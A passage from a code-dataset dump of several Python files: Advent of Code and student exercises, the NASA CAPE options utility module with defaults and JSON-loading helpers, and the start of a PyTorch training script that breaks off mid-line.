i=0\n while i < len(A) and A[i] == i+1:\n i += 1\n\n return i+1\n\nA = [1, 3, 6, 4, 1, 2]\nprint(solution(A))","repo_name":"anyl92/ALGORITHM","sub_path":"codewars/191207_test1.py","file_name":"191207_test1.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30920929585","text":"import os,sys\nwith open(os.path.join(sys.path[0], \"puzzleInput.txt\"), \"r\") as pInput:\n lines = pInput.readlines()\ncleanList = []\nfor e in lines:\n cleanList.append(e.strip())\n#gamma = most common bit\n#epislon least common bit\ndef findGamma(lines):\n mostCommon = []\n for j in range(len(lines[0])):\n count = 0\n for i in range(len(lines)):\n count += int(lines[i][j])\n \n if count / len(lines) < 0.5:\n mostCommon.append(\"0\")\n else:\n mostCommon.append(\"1\")\n return int(\"\".join(mostCommon),base=2)\n\ndef findEpi(lines):\n leastCommon = []\n for j in range(len(lines[0])):\n count = 0\n for i in range(len(lines)):\n count += int(lines[i][j])\n \n if count / len(lines) > 0.5:\n leastCommon.append(\"0\")\n else:\n leastCommon.append(\"1\")\n return int(\"\".join(leastCommon),base=2)\n\ndef power(lines):\n return findEpi(lines) * findGamma(lines)\n\n\ndef countMost(lines, pos):\n count0 = 0\n count1 = 0\n for e in lines:\n if int(e[pos]) == 0:\n count0 += 1\n elif int(e[pos]) == 1:\n count1 += 1\n \n if count0 > count1:\n return 0\n else:\n return 1\n\ndef countLeast(lines,pos):\n most = countMost(lines,pos)\n if most == 1:\n return 0\n else:\n return 1\n\n\ndef findOxygen(lines):\n tempList = lines[:]\n xpos = 0\n while len(tempList) > 1:\n most = countMost(tempList, xpos)\n for i in reversed(range(len(tempList))):\n if int(tempList[i][xpos]) != most:\n del tempList[i] \n xpos += 1\n if xpos == len(tempList[0]):\n xpos = 0\n \n return int(tempList[0],base=2)\n \ndef findCOO(lines):\n tempList = lines[:]\n xpos = 0\n while len(tempList) > 1:\n least = countLeast(tempList, xpos)\n for i in reversed(range(len(tempList))):\n if int(tempList[i][xpos]) != least:\n del tempList[i] \n xpos += 1\n if xpos == len(tempList[0]):\n xpos = 0\n \n return int(tempList[0],base=2)\n \n\ndef findLife(lines):\n return findOxygen(lines) * findCOO(lines)\n\nprint(findLife(cleanList))","repo_name":"vrnprkh/AOC-2021","sub_path":"Day03/Day03.py","file_name":"Day03.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10580381611","text":"#Entrada\r\ncant=int(input(\"Digite cantidad de estudiantes: \"))\r\nPuntM=0 #Puntaje mayor\r\nPuntm=0 #Puntaje menor\r\nprom=0\r\nfor i in range(1,cant+1):\r\n Nom=str(input(\"Dijite el nombre del estudiante: \"))\r\n Punt=float(input(\"Digite nota del estudiante:\"))\r\n if(Punt<=Puntm):\r\n Puntm=Punt\r\n elif(PuntM<=Punt):\r\n PuntM=Punt\r\n elif(Punt>=0):\r\n prom=i+Punt\r\n\r\n \r\n#Caja negra\r\nprint(\"El nombre del estudiantes es:\",Nom)\r\nprint(\"El promedio es:\",prom/cant)\r\nprint(\"El puntaje más alto:\",PuntM)\r\nprint(\"El puntaje más bajo:\",Puntm)","repo_name":"DinaTuesta27/taller4algoypromcontrolrepetitivo","sub_path":"Taller estructuras de control Repetitivas AyP4/Ejercicio_12.py","file_name":"Ejercicio_12.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30948475187","text":"r\"\"\"\n:mod:`cape.cfdx.options.util`: Utilities for options modules\n=============================================================\n\nThis module provides utilities for the CAPE options module. It includes\nthe :class:`cape.options.util.odict` class upon which all CAPE options\nclasses are based, and it several basic methods useful to processing\noptions.\n\nThe :func:`getel` and :func:`setel` methods in particular play an\nimportant role in the entire CAPE coding strategy.\n\n\"\"\"\n\n# Standard library modules\nimport copy\nimport functools\nimport io\nimport json\nimport os\nimport re\n\n# Third-party modules\nimport numpy as np\n\n\n# Local folders\nCAPE_OPTS_FOLDER = os.path.dirname(os.path.abspath(__file__))\nCAPE_FOLDER = os.path.dirname(CAPE_OPTS_FOLDER)\n\n# Get the root directory of the module.\n_fname = os.path.abspath(__file__)\n\n# Saved folder names\n_OptsFolder = os.path.split(_fname)[0]\n_CFDXFolder = os.path.split(_OptsFolder)[0]\n# Actual module home\nCapeFolder = os.path.split(_CFDXFolder)[0]\n# Parent folder\nBaseFolder = os.path.split(CapeFolder)[0]\n\n# Backup default settings\nrc = {\n \"nSubmit\": 10,\n \"Verbose\": False,\n \"GroupMesh\": False,\n \"ConfigFile\": \"Config.xml\",\n \"RefArea\": 1.0,\n \"RefLength\": 1.0,\n \"RefPoint\": [[0.0, 0.0, 0.0]],\n \"Xslices\": [0.0],\n \"Yslices\": [0.0],\n \"Zslices\": [0.0],\n \"nIter\": 100,\n \"PhaseSequence\": [[0]],\n \"PhaseIters\": [[200]],\n \"PythonExec\": None,\n \"WarmStart\": False,\n \"cfl\": 1.1,\n \"cflmin\": 0.8,\n \"nOrders\": 12,\n \"dt\": 0.1,\n \"qsub\": True,\n \"sbatch\": False,\n \"Resubmit\": False,\n \"Continue\": True,\n \"PreMesh\": False,\n \"y_is_spanwise\": True,\n \"db_stats\": 0,\n \"db_min\": 0,\n \"db_max\": 0,\n \"db_dir\": \"data\",\n \"db_nCut\": 200,\n \"Delimiter\": \",\",\n \"binaryIO\": True,\n \"tecO\": True,\n \"nProc\": 8,\n \"mpicmd\": \"mpiexec\",\n \"MPI\": False,\n \"TriFile\": \"Components.i.tri\",\n \"mesh2d\": False,\n \"dC\": 0.01,\n \"nAvg\": 100,\n \"nPlot\": None,\n \"nRow\": 2,\n \"nCol\": 2,\n \"FigWidth\": 8,\n \"FigHeight\": 6,\n \"PBS_j\": \"oe\",\n \"PBS_o\": None,\n \"PBS_e\": None,\n \"PBS_r\": \"n\",\n \"PBS_S\": \"/bin/bash\",\n \"PBS_select\": 1,\n \"PBS_ncpus\": 20,\n \"PBS_mpiprocs\": 20,\n \"PBS_model\": \"ivy\",\n \"PBS_aoe\": None,\n \"PBS_W\": \"\",\n \"PBS_q\": \"normal\",\n \"PBS_walltime\": \"8:00:00\",\n \"Slurm_A\": \"\",\n \"Slurm_C\": \"\",\n \"Slurm_gid\": \"\",\n \"Slurm_N\": 1,\n \"Slurm_n\": 20,\n \"Slurm_time\": \"8:00:00\",\n \"Slurm_shell\": \"/bin/bash\",\n \"Slurm_p\": \"normal\",\n \"ulimit_c\": 0,\n \"ulimit_d\": \"unlimited\",\n \"ulimit_e\": 0,\n \"ulimit_f\": \"unlimited\",\n \"ulimit_i\": 127812,\n \"ulimit_l\": 64,\n \"ulimit_m\": \"unlimited\",\n \"ulimit_n\": 1024,\n \"ulimit_p\": 8,\n \"ulimit_q\": 819200,\n \"uliimt_r\": 0,\n \"ulimit_s\": 4194304,\n \"ulimit_t\": \"unlimited\",\n \"ulimit_u\": 127812,\n \"ulimit_v\": \"unlimited\",\n \"ulimit_x\": \"unlimited\",\n \"ArchiveFolder\": \"\",\n \"ArchiveFormat\": \"tar\",\n \"ArchiveAction\": \"full\",\n \"ArchiveProgress\": True,\n \"ArchiveType\": \"full\",\n \"ArchiveTemplate\": \"full\",\n \"ArchiveFiles\": [],\n \"ArchiveGroups\": [],\n \"ProgressDeleteFiles\": [],\n \"ProgressDeleteDirs\": [],\n \"ProgressTarGroups\": [],\n \"ProgressTarDirs\": [],\n \"ProgressUpdateFiles\": [],\n \"ProgressArchiveFiles\": [],\n \"PreDeleteFiles\": [],\n \"PreDeleteDirs\": [],\n \"PreTarGroups\": [],\n \"PreTarDirs\": [],\n \"PreUpdateFiles\": [],\n \"PostDeleteFiles\": [],\n \"PostDeleteDirs\": [],\n \"PostUpdateFiles\": [],\n \"PostTarGroups\": [],\n \"PostTarDirs\": [],\n \"PostUpdateFiles\": [],\n \"SkeletonFiles\": [\"case.json\"],\n \"SkeletonTailFiles\": [],\n \"SkeletonTarDirs\": [],\n \"RemoteCopy\": \"scp\",\n \"TarPBS\": \"tar\",\n}\n\n# TriMap settings\nrc[\"atoldef\"] = 1e-2\nrc[\"rtoldef\"] = 1e-4\nrc[\"ctoldef\"] = 1e-4\nrc[\"ztoldef\"] = 5e-2\nrc[\"antoldef\"] = 3e-2\nrc[\"rntoldef\"] = 1e-4\nrc[\"cntoldef\"] = 1e-3\nrc[\"rztoldef\"] = 1e-5\n\n# Intersect options\nrc['intersect_rm'] = False\nrc['intersect_smalltri'] = 1e-4\nrc['intersect_triged'] = True\n\n# AFLR3 settings\nrc['aflr3_cdfr'] = 1.1\nrc['aflr3_cdfs'] = None\nrc['aflr3_mdf'] = 2\nrc['aflr3_mdsblf'] = 1\nrc['aflr3_nqual'] = 2\n\n\nARRAY_TYPE_NAMES = {'list', 'tuple', 'array', 'ndarray'}\n\n\n# Utility function to get elements sanely\ndef getel(x, i=None):\n r\"\"\" Return element *i* of an array if possible\n \n :Call:\n >>> x = getel(x)\n >>> xi = getel(x, i)\n :Inputs:\n *x*: number-like or list-like\n A number or list or NumPy vector\n *i*: ``None`` | :class:`int`\n Index\n :Outputs:\n *xi*: scalar\n Equal to ``x[i]`` if possible, ``x[-1]`` if *i* is greater\n than the length of *x*, or ``x`` if *x* is not a\n :class:`list` or :class:`numpy.ndarray` instance\n :Examples:\n >>> getel('abc', 2)\n 'abc'\n >>> getel(1.4, 0)\n 1.4\n >>> getel([200, 100, 300], 1)\n 100\n >>> getel([200, 100, 300], 15)\n 300\n >>> getel([200, 100, 300])\n 200\n :Versions:\n * 2014-07-29 ``@ddalle``: Version 1.0\n * 2021-10-18 ``@ddalle``: Version 1.1; add :class:`tuple`\n \"\"\"\n # Check the type.\n if i is None:\n return x\n if type(x).__name__ in ARRAY_TYPE_NAMES:\n # Check for empty input.\n if len(x) == 0:\n return None\n # Array-like\n if i:\n # Check the length.\n if i >= len(x):\n # Take the last element.\n return x[-1]\n else:\n # Take the *i*th element.\n return x[i]\n else:\n # Use the first element.\n return x[0]\n else:\n # Scalar\n return x\n\n\n# Utility function to set elements sanely\ndef setel(x, i, xi):\n r\"\"\"Return element *i* of an array if possible\n \n :Call:\n >>> y = setel(x, i, xi)\n \n :Inputs:\n *x*: number-like or list-like\n A number or list or NumPy vector\n *i*: :class:`int`\n Index. If *i* is ``None``, the output is reset to *xi*\n *xi*: scalar\n Value to set at scalar\n :Outputs:\n *y*: number-like or list-like\n Input *x* with ``y[i]`` set to ``xi`` unless *i* is ``None``\n :Examples:\n >>> setel(['a', 2, 'c'], 1, 'b')\n ['a', 'b', 'c']\n >>> setel(['a', 'b'], 2, 'c')\n ['a', 'b', 'c']\n >>> setel('a', 2, 'c')\n ['a', None, 'b']\n >>> setel([0, 1], None, 'a')\n 'a'\n :Versions:\n * 2014-07-29 ``@ddalle``: Version 1.0\n * 2021-10-18 ``@ddalle``: Version 1.1; add :class:`tuple`\n \"\"\"\n # Check the index input.\n if i is None:\n # Scalar output\n return xi\n # Ensure list\n if type(x).__name__ in ARRAY_TYPE_NAMES:\n # Already a list; make a copy\n y = list(x)\n else:\n # Create a singleton list\n y = [x]\n # Get default value\n if len(y) > 0:\n # Select the last value\n ydef = y[-1]\n else:\n # Set ``None`` until we get something\n ydef = None\n # Make sure *y* is long enough.\n for j in range(len(y), i):\n y.append(ydef)\n # Check if we are setting an element or appending it\n if i >= len(y):\n # Append\n y.append(xi)\n else:\n # Set the value\n y[i] = xi\n # Output\n return y\n \n\n# Function to ensure scalar from above\ndef rc0(p):\n r\"\"\"Return default setting for named parameter\n \n :Call:\n >>> v = rc0(p)\n :Inputs:\n *p*: :class:`str`\n Name of parameter to extract\n :Outputs:\n *v*: any\n Either ``rc[p]`` or ``rc[p][0]``, whichever is appropriate\n :Versions:\n * 2014-08-01 ``@ddalle``: Version 1.0\n \"\"\"\n # Use the :func:`getel` function to do this.\n return getel(rc.get(p), 0)\n\n\n# Regular expression for JSON file inclusion\nregex = re.compile(\n r'(?P.*)' +\n r'(?PJSONFile\\(\"(?P[-\\w.+= /\\\\]+)\"\\))' +\n r'(?P.*)')\n\n\n# Function to expand CSV file inputs\ndef expandJSONFile(fname):\n r\"\"\"Expand contents of other JSON files\n \n :Call:\n >>> txt, fnames, linenos = expandJSONFile(fname)\n :Inputs:\n *fname*: :class:`str` | :class:`unicode`\n Name of JSON file to read\n :Outputs:\n *txt*: :class:`unicode`\n Full text with references to JSON file(s) expanded\n *fnames*: :class:`list`\\ [:class:`str`]\n List of files read (can include the same file multiple\n times) including *fname* and any other expanded\n ``JSONFile()`` directives\n *linenos*: :class:`np.ndarray` (:class:`int`, ndim=2)\n Line numbers in original files; column *j* represents the\n line number of each line in file *j*; ``0`` for lines not\n from file *j*\n :Versions:\n * 2015-12-10 ``@ddalle``: Version 1.0\n \"\"\"\n # Read the input file.\n txt = io.open(fname, mode=\"r\", encoding=\"utf-8\").read()\n # Split lines\n lines = txt.rstrip().split('\\n')\n # Number of lines\n n = len(lines)\n # Initialize line numbers\n linenos = np.zeros((n,1), dtype=\"int\")\n linenos[:,0] = 1 + np.arange(n)\n # Initialize list of file names\n fnames = [fname]\n # Number of JSON files read (can read same file more than once)\n nf = 1\n # Start with the first line.\n i = 0\n # Loop through lines.\n while i < len(lines):\n # Get the line\n line = lines[i]\n # Check if line starts with a comment\n if line.lstrip().startswith(\"//\"):\n # Javascript-style comment\n lines[i] = \"\"\n continue\n elif line.lstrip().startswith(\"#\"):\n # Python-style comment\n lines[i] = \"\"\n continue\n # Check for an inclusion\n match = regex.search(line)\n # If no match, move along\n if match is None:\n # Go to next line\n i += 1\n continue\n # Extract the file name.\n fjson = match.group(\"json\")\n # Expand that JSON file\n t_j, F_j, ln_j = expandJSONFile(fjson)\n # Split text to lines\n lines_j = t_j.rstrip().split(\"\\n\")\n # Number of lines\n n_j = len(lines_j)\n # Number of included files\n nf_j = len(F_j)\n # Pad line counts with zeros for lines of new file\n if n_j > 1:\n # Split current line and insert n_j-1 zeros\n linenos = np.vstack((\n linenos[:i+1,:], np.zeros((n_j-2,nf), dtype=\"int\"),\n linenos[i:,:]))\n # Create line counts for new file\n linenos_json = np.vstack((\n np.zeros((i,nf_j), dtype=\"int\"), ln_j,\n np.zeros((n-i-1,nf_j), dtype=\"int\")))\n # Accumulate line numbers and file list\n fnames += F_j\n linenos = np.hstack((linenos, linenos_json))\n # Modify line count and file count\n n += (n_j-1)\n nf += nf_j\n # Update first and last line of expansion\n if n_j == 1:\n # One-line inclusion\n lines[i] = line.replace(match.group(\"cmd\"), lines_j[0])\n else:\n # Update first line\n lines[i] = match.group(\"before\") + lines_j[0]\n # Update last line of inclusion\n lines_j[-1] = lines_j[-1].rstrip() + match.group(\"after\")\n # Update line set\n lines = lines[:i+1] + lines_j[1:] + lines[i+1:]\n # Check for multiple inclusions\n if regex.search(lines[i]):\n # Remain on this line\n pass\n else:\n # Move past expanded file\n i += n_j\n # Return the lines as one string.\n txt = \"\\n\".join(lines) + \"\\n\"\n # Output\n return txt, fnames, linenos\n\n\n# Function to read JSON file with all the works\ndef loadJSONFile(fname):\n r\"\"\"Read JSON file w/ helpful error handling and comment stripping\n \n :Call:\n >>> d = loadJSONFile(fname)\n :Inputs:\n *fname*: :class:`str`\n Name of JSON file to read\n :Outputs:\n *d*: :class:`dict`\n JSON contents in Python form\n :Versions:\n * 2015-12-15 ``@ddalle``: Version 1.0\n \"\"\"\n # Read the input file\n txt, fnames, linenos = expandJSONFile(fname)\n # Process into dictionary\n try:\n # Process into dictionary\n d = json.loads(txt)\n except Exception as e:\n # Get the line number\n try:\n # Read from the error message\n etxt = re.findall('line [0-9]+', e.args[0])[0]\n # Line number\n n = int(etxt.split()[1])\n # Get lines so we can print surrounding text by line number\n lines = txt.split(\"\\n\")\n # Start and end line number\n n0 = max(n-3, 0)\n n1 = min(n+2, len(lines))\n # Initialize message with \n msg = \"Error while reading JSON file '%s':\\n\" % fname\n # Add the exception's message\n msg += \"\\n\".join(list(e.args)) + \"\\n\"\n # Loop through individual files\n for i, fn in enumerate(fnames):\n # Get line number \n lni = linenos[n-1,i]\n # Skip if ``0``\n if lni == 0: continue\n # Add to report\n msg += \" (line %i of file '%s')\\n\" % (lni, fn)\n # Additional header\n msg += \"\\nLines surrounding problem area (comments stripped):\\n\"\n # Print some lines around the problem\n for i in range(n0, n1):\n # Add line with line number\n if i+1 == n:\n # Add special marker for reported line\n msg += (\"%4i> %s\\n\" % (i+1, lines[i]))\n else:\n # Neighboring line\n msg += (\"%4i: %s\\n\" % (i+1, lines[i]))\n # Show the message\n raise ValueError(msg)\n except ValueError as e:\n # Raise the error we just made.\n raise e\n except Exception:\n # Unknown error\n raise e\n # Output\n return d\n\n\n# Function to get the default settings.\ndef getDefaults(fname):\n r\"\"\"Read default settings configuration file\n \n :Call:\n >>> defs = getDefaults(fname)\n :Inputs:\n *fname*: :class:`str`\n Name of file with settings to read\n :Outputs:\n *defs*: :class:`dict`\n Dictionary of settings read from JSON file\n :Versions:\n * 2014-06-03 ``@ddalle``: Version 1.0\n * 2014-07-28 ``@ddalle``: Version 1.1; in options module\n \"\"\"\n # Process the default input file.\n return loadJSONFile(fname)\n\n\n# Function to get the default CAPE settings\ndef getCapeDefaults():\n r\"\"\"Read default CAPE settings configuration file\n \n :Call:\n >>> defs = getCapeDefaults()\n :Outputs:\n *defs*: :class:`dict`\n Dictionary of settings read from JSON file\n :Versions:\n * 2015-09-20 ``@ddalle``: Version 1.0\n * 2021-03-01 ``@ddalle``: Version 2.0; local JSON file\n \"\"\"\n # File name\n fname = os.path.join(CAPE_OPTS_FOLDER, 'cape.default.json')\n # Read the settings.\n return getDefaults(fname)\n\n\n# Function to get template\ndef getTemplateFile(fname):\n r\"\"\"Get the absolute path to a template file by name\n \n :Call:\n >>> fabs = getTemplateFile(fname)\n :Inputs:\n *fname*: :class:`str`\n Name of file, such as :file:`input.cntl`\n *fabs*: :class:`str`\n Full path to file\n :Versions:\n * 2015-10-26 ``@ddalle``: Version 1.0\n \"\"\"\n # Join with BaseFolder and 'templates'\n return os.path.join(BaseFolder, 'templates', fname)\n\n\n# Get the keys of the default dict.\ndef applyDefaults(opts, defs):\n r\"\"\"Recursively apply defaults for any missing options\n \n :Call:\n >>> opts = applyDefaults(opts, defs)\n :Inputs:\n *opts*: :class:`dict` | :class:`odict`\n Options dictionary with some options possibly missing\n *defs*: :class:`dict`\n Full dictionary of default settings\n :Outputs:\n *opts*: :class:`dict` | :class:`odict`\n Input dictionary with all of the fields of *defs*\n :Versions:\n * 2014-06-17 ``@ddalle``: Version 1.0\n * 2014-07-28 ``@ddalle``: Version 1.1; move to options module\n \"\"\"\n # Loop through the keys in the options dict.\n for k in defs:\n # Check if the key is non-default.\n if k not in opts:\n # Assign the key.\n opts[k] = defs[k]\n elif (type(opts[k]) is dict) and (not k.startswith(\"Ref\")):\n # Recurse for dictionaries.\n opts[k] = applyDefaults(opts[k], defs[k])\n # Output the modified defaults.\n return opts\n\n\n# Test if a variable is \"list-like\"\ndef isArray(x):\n r\"\"\"Test if a variable is \"list-like.\"\n \n :Call:\n >>> q = isArray(x)\n :Inputs:\n *x*: any\n Any variable\n :Outputs:\n *q*: :class:`bool`\n ``True`` if and only if *x* is a list or NumPy array\n :Versions:\n * 2014-12-17 ``@ddalle``: Version 1.0\n \"\"\"\n return (type(x).__name__ in ARRAY_TYPE_NAMES)\n\n\n# Test if a variable is \"string-like\"\ndef isStr(x):\n r\"\"\"Test if a variable is \"string-like\"\n \n :Call:\n >>> q = isArray(x)\n :Inputs:\n *x*: any\n Any variable\n :Outputs:\n *q*: :class:`bool`\n ``True`` if and only if *x* is a string or unicode\n :Versions:\n * 2014-12-17 ``@ddalle``: Version 1.0\n \"\"\"\n # Get the type.\n typ = type(x).__name__\n # Test it.\n return typ.startswith('str') or (typ in ['unicode'])\n\n\n# Dictionary derivative specific to options\nclass odict(dict):\n r\"\"\"Dictionary-based options module\n \n :Call:\n >>> opts = odict(**kw)\n :Inputs:\n *kw*: :class:`dict`\n Dictionary of options\n :Outputs:\n *opts*: :class:`cape.options.util.odict`\n Dictionary-based options interface\n :Versions:\n * 2014-08-02 ``@ddalle``: Version 1.0\n * 2015-11-10 ``@ddalle``: More robust :func:`get_key` using *rck*\n \"\"\"\n # General \"get\" function\n def get_key(self, k, i=None, rck=None):\n r\"\"\"Intelligently get option for index *i* of key *k*\n\n This is a two-step process. The first is to get the dictionary\n value or the default if *k* is not in *opts*. The default is\n ``rc[k]``. Let *V* be the result of the process.\n\n The second step is to apply indexing. If *V* is a scalar or *i*\n is ``None``, then *V* is the output. Otherwise, the function\n will attempt to return ``V[i]``, but if *i* is too large,\n ``V[-1]`` is the output.\n\n :Call:\n >>> v = opts.get_key(k, i, rck=None)\n :Inputs:\n *k*: :class:`str`\n Name of key to get\n *i*: :class:`int` | ``None``\n Index to apply\n *rck*: :class:`str` | ``None``\n Name of *rc0* key to default to\n :Outputs:\n *v*: **any**\n Let ``V=opts.get(k,rc[k])``. Then *v* is either\n ``V[i]`` if possible, ``V[-1]`` if *V* is a list and *i*\n is not ``None``, or ``V`` otherwise\n :See also:\n * :func:`cape.options.util.getel`\n :Versions:\n * 2014-08-02 ``@ddalle``: Version 1.0\n * 2015-11-10 ``@ddalle``: Version 1.1; add *rck*\n \"\"\"\n # Default key name\n if rck is None: rck = k\n # Get the value after applying defaults.\n v = self.get(k, rc.get(rck))\n # Apply intelligent indexing.\n return getel(v, i)\n \n # General \"set\" function\n def set_key(self, k, v=None, i=None, rck=None):\n r\"\"\"Set option for key *k*\n\n This sets the value for ``opts[k]`` or ``opts[k][i]`` if\n appropriate. If *i* is greater than the length of ``opts[k]``,\n then ``opts[k]`` is appended with its current last value enough\n times to make ``opts[k][i]`` exist.\n\n :Call:\n >>> opts.set_key(k, v=None, i=None, rck=None)\n :Inputs:\n *k*: :class:`str`\n Name of key to set\n *i*: :class:`int` | ``None``\n Index to apply\n *v*: any\n Value to set\n *rck*: :class:`str` | ``None``\n Name of key in *rc0* default option dictionary; defaults to *k*\n :See also:\n * :func:`cape.options.util.setel`\n :Versions:\n * 2014-08-02 ``@ddalle``: Version 1.0\n * 2015-11-10 ``@ddalle``: Version 1.1; add *rck*\n \"\"\"\n # Check for default key name\n if rck is None: rck = k\n # Check for default value.\n if v is None:\n # Get the default, but ensure a scalar.\n v = rc0(rck)\n # Get the current full setting.\n V = self.get(k, rc.get(rck))\n # Assign the input value .\n self[k] = setel(V, i, v)\n \n # Copy\n def copy(self):\n r\"\"\"Create a copy of an options interface\n \n :Call:\n >>> opts1 = opts.copy()\n :Inputs:\n *opts*: :class:`odict`\n Options instance\n :Outputs:\n *opts1*: :class:`odict`\n Deep copy of options instance\n :Versions:\n * 2019-05-10 ``@ddalle``: Version 1.0\n \"\"\"\n # Initialize copy\n opts = self.__class__()\n # Loop through keys\n for k, v in self.items():\n # Check the type\n if not isinstance(v, dict):\n # Save a copy of the key\n opts[k] = copy.copy(v)\n else:\n # Recurse\n opts[k] = v.copy()\n # Output\n return opts\n\n # Generic subsection\n def init_section(self, cls, sec=None, parent=None, prefix=None):\n r\"\"\"Initialize a generic section\n\n :Call:\n >>> opts.init_section(cls, sec=None, **kw)\n :Inputs:\n *opts*: :class:`odict`\n Options interface\n *cls*: :class:`type`\n Class to use for *opts[sec]*\n *sec*: {*cls.__name__*} | :class:`str`\n Specific key name to use for subsection\n *parent*: {``None``} | :class:`str`\n Other subsection from which to inherit defaults\n *prefix*: {``None``} | :class:`str`\n Prefix to add at beginning of each key\n :Versions:\n * 2021-10-18 ``@ddalle``: Version 1.0\n \"\"\"\n # Default name\n if sec is None:\n # Use the name of the class\n sec = cls.__name__\n # Check if present\n if sec not in self:\n # Create empty instance\n self[sec] = cls()\n # Otherwise get value\n v = self[sec]\n # Check its type\n if isinstance(v, cls):\n # Already good\n pass\n elif isinstance(v, dict):\n # Convert :class:`dict` to special class\n if prefix is None:\n # Transfer keys into new class\n self[sec] = cls(**v)\n else:\n # Create dict with prefixed key names\n tmp = {\n prefix + k: vk\n for k, vk in v.items()\n }\n # Convert *tmp* instead of *v*\n self[sec] = cls(**tmp)\n else:\n # Got something other than a mapping\n print(\" Warning: could not convert options section '%s',\" % sec)\n print(\" which has type '%s'\" % type(v).__name__)\n return\n # Check for *parent* to define default settings\n if parent:\n # Get the settings of parent\n vp = self.get(parent)\n # Ensure it's a dict\n if not isinstance(vp, dict):\n return\n # Loop through *vp*, but don't overwrite\n for k, vpk in vp.items():\n v.setdefault(k, vpk)\n\n\n# Decorator to get function from subclass\ndef subsec_func(cls, sec=None, parent=None, init=True):\n r\"\"\"Decorator (w/ args) to apply a function from a subsection class\n \n :Call:\n >>> f = subsec_func(cls, sec=None, parent=None, init=True)\n :Inputs:\n *cls*::class:`type`\n Class to apply to subsection\n *sec*: {*cls.__name*} | :class:`str`\n Name of subsection\n *init*: {``True``} | ``False``\n If ``True`` and nontrivial *cls*, initialize subsection\n *parent*: {``None``} | :class:`str`\n Name of section from which to get default settings\n :Outputs:\n *f*: :class:`function`\n Decorator with arguments expanded\n :Examples:\n .. code-block:: python\n \n @subsec_func(\"RunControl\", RunControl)\n def get_PhaseSequence(self, *a, **kw):\n pass\n \n :Versions:\n * 2019-01-10 ``@ddalle``: Version 1.0\n * 2021-10-18 ``@ddalle``: Version 1.1; default *sec*\n \"\"\"\n # Default *sec*\n if sec is None:\n sec = cls.__name__\n # Decorator for the function\n def decorator_subsec(func):\n # Inherit metadata from func\n @functools.wraps(func)\n # The before and after function\n def wrapper(self, *a, **kw):\n # Initialize the section\n if init and (cls is not None):\n self.init_section(cls, sec, parent=parent)\n # Get the function from the subsection\n f = getattr(self[sec], func.__name__)\n # Call the function from the subsection\n v = f(*a, **kw)\n # Return value\n return v\n # Copy the docstring\n if cls is not None:\n wrapper.__doc__ = getattr(cls,func.__name__).__doc__\n # Output\n return wrapper\n # Return decorator\n return decorator_subsec\n\n\n# Apply all methods of one subsection class to parent\ndef promote_subsec(cls1, cls2, sec=None, skip=[], **kw):\n r\"\"\"Promote all methods of a subsection class to parent options class\n\n Methods of parent class will not be overwritten\n\n :Call:\n >>> promote_subsec(cls1, cls2, sec=None, skip=[], **kw)\n :Inputs:\n *cls1*: :class:`type`\n Parent class\n *cls2*: :class:`type`\n Subsection class\n *skip*: {``[]``} | :class:`list`\n List of methods from *cls2* not to add to *cls1*\n *init*: {``True``} | ``False``\n If ``True``, initialize subsection when *cls1* methods used\n *parent*: {``None``} | :class:`str`\n Name of section from which to get default settings\n :Versions:\n * 2019-01-10 ``@ddalle``: Version 1.0\n \"\"\"\n # Get property dictionaries\n dict1 = cls1.__dict__\n dict2 = cls2.__dict__\n # Create the decorator to promote each method (function)\n f_deco = subsec_func(cls2, sec, **kw)\n # Loop through methods of *cls2*\n for fn in dict2:\n # Manual skipping\n if fn in skip:\n continue\n # Get value of *cls2* attribute\n func = dict2[fn]\n # Skip if not a function\n if not callable(func):\n continue\n # Check if already present\n if fn in dict1:\n continue\n # Set attribute to decorated function\n setattr(cls1, fn, f_deco(func))\n\n","repo_name":"nasa/cape","sub_path":"cape/cfdx/options/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":27434,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"39888967255","text":"# -*- coding: utf-8 -*-\nimport torch\nimport numpy as np\nimport pandas as pd\nimport os\nimport pdb\nimport torchvision.transforms\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch import nn\n\nfrom collections import defaultdict\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\n\n__LAYER_LIST__ = ['layer 1', 'layer 2', 'layer 3', 'layer 4', 'layer 5']\n\ndef img_preprocess(x, y=None, use_gpu=True):\n x = torch.tensor(x) / 255.0\n if use_gpu:\n x = x.cuda()\n if y is not None:\n y = torch.LongTensor(y)\n if use_gpu:\n y = y.cuda()\n return x, y\n\n else:\n return x\n\ndef img_preprocess_cifar(x, y=None, use_gpu=True):\n mean_list = [125.3, 123.0, 113.9]\n std_list = [63.0, 62.1, 66.7]\n\n new_x_list = []\n for i, m in enumerate(mean_list):\n x_ = (x[:,i] - m) / (std_list[i])\n new_x_list.append(x_)\n \n x = np.array(new_x_list).transpose(1,0,2,3)\n \n # flatten\n x = x.reshape(len(x), 3*32*32)\n x = torch.Tensor(x)\n\n if use_gpu:\n x = x.cuda()\n\n if y is not None:\n y = torch.LongTensor(y)\n if use_gpu:\n y = y.cuda()\n\n return x, y\n\n else:\n return x\n\ndef train(model,\n sub_idx,\n x_tr, y_tr, \n x_va, y_va, \n num_epoch,\n batch_size,\n lr, \n weight_decay,\n early_stop_ckpt_path,\n early_stop_tolerance=3,\n verbose=True,\n ):\n \"\"\"Given selected subset, train the model until converge.\n \"\"\"\n # early stop\n best_va_acc = 0\n num_all_train = 0\n early_stop_counter = 0\n\n if not os.path.exists('./checkpoints'):\n os.makedirs('./checkpoints')\n\n # init training\n optimizer = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=lr, weight_decay=weight_decay)\n num_all_tr_batch = int(np.ceil(len(sub_idx) / batch_size))\n\n # num class\n num_class = torch.unique(y_va).shape[0]\n \n for epoch in tqdm(range(num_epoch)):\n total_loss = 0\n model.train()\n np.random.shuffle(sub_idx)\n\n for idx in range(num_all_tr_batch):\n batch_idx = sub_idx[idx*batch_size:(idx+1)*batch_size]\n x_batch = x_tr[batch_idx]\n y_batch = y_tr[batch_idx]\n\n pred = model(x_batch)\n if num_class > 2:\n loss = F.cross_entropy(pred, 